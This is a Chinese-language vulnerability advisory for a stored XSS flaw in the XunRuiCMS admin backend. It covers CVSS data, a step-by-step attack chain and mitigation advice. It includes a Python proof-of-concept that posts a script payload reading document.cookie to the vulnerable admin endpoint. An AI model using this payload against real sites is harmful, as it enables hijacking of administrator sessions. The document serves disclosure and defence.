CVE-2025-14005 XunRuiCMS存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14005

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

dayrui XunRuiCMS

漏洞概述

CVE-2025-14005是存在于dayrui XunRuiCMS up to 4.7.1版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于管理后台的「添加显示名称字段」（Add Display Name Field）功能中，具体涉及文件/admind45f74adbd95.php。通过操纵data[name]参数，攻击者可以在页面中注入恶意JavaScript代码。由于漏洞出现在管理后台功能，且需要高权限用户交互才能触发，因此CVSS评分仅为2.4（低危）。攻击者可以利用此漏洞窃取管理员Cookie、会话劫持或进行其他恶意操作。该漏洞已于2025年12月4日公开披露，厂商在提前收到通知后未做出任何回应。

技术细节

该漏洞是一个存储型XSS（Stored XSS）漏洞，存在于XunRuiCMS管理后台的字段添加功能中。漏洞位置：/admind45f74adbd95.php?c=field&m=add&rname=site&rid=1&page=0，受影响的参数为data[name]。攻击者通过在添加显示名称字段时，在data[name]参数中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>。由于该输入在存储后未进行充分的输出过滤或编码，当其他管理员访问相关页面时，恶意脚本将在其浏览器上下文中执行。漏洞利用条件：1）攻击者需具有管理后台高权限；2）需要诱导其他管理员用户访问触发页面；3）用户交互（UI:R）是必要条件。虽然CVSS评分较低，但存储型XSS在管理后台环境中仍可能导致严重的会话劫持和权限提升风险。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用XunRuiCMS，并确定管理后台登录入口

STEP 2

Authentication

攻击者获取管理后台高权限账户凭据或通过其他方式获得管理员会话

STEP 3

Payload Injection

攻击者构造恶意XSS payload，通过data[name]参数注入到/admind45f74adbd95.php的字段添加功能中

STEP 4

Storage

恶意脚本被存储在数据库中，未经过滤的输入被保存

STEP 5

Trigger

其他管理员用户访问相关页面时，存储的恶意脚本在其浏览器中执行

STEP 6

Exploitation

攻击者通过XSS窃取管理员Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14005 PoC - Stored XSS in XunRuiCMS
# Target: dayrui XunRuiCMS <= 4.7.1
# Vulnerability: Stored XSS via data[name] parameter

target_url = "http://target.com/admind45f74adbd95.php"

# XSS Payload
xss_payload = "<script>alert(document.cookie)</script>"

# Parameters for the vulnerable endpoint
params = {
    "c": "field",
    "m": "add",
    "rname": "site",
    "rid": "1",
    "page": "0"
}

# Data payload with XSS in data[name]
data = {
    "data[name]": xss_payload
}

# Send the request with authentication (admin credentials required)
cookies = {
    "admin_session": "your_admin_session_here"
}

try:
    response = requests.post(
        target_url,
        params=params,
        data=data,
        cookies=cookies,
        timeout=10
    )
    
    if response.status_code == 200:
        print("[+] XSS payload sent successfully")
        print("[+] Payload stored in database")
        print("[+] XSS will trigger when admin visits the page")
    else:
        print("[-] Request failed")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

dayrui XunRuiCMS <= 4.7.1

防御指南

临时缓解措施

在厂商发布修复补丁之前，可采取以下临时缓解措施：1）对管理后台实施严格的访问控制，限制可访问后台的用户范围；2）在Web应用防火墙（WAF）中配置XSS过滤规则，对data[name]等参数进行检测和拦截；3）启用浏览器的XSS过滤器作为辅助防护；4）监控管理后台的异常操作日志，及时发现可疑活动；5）考虑暂时禁用或限制Add Display Name Field功能的使用。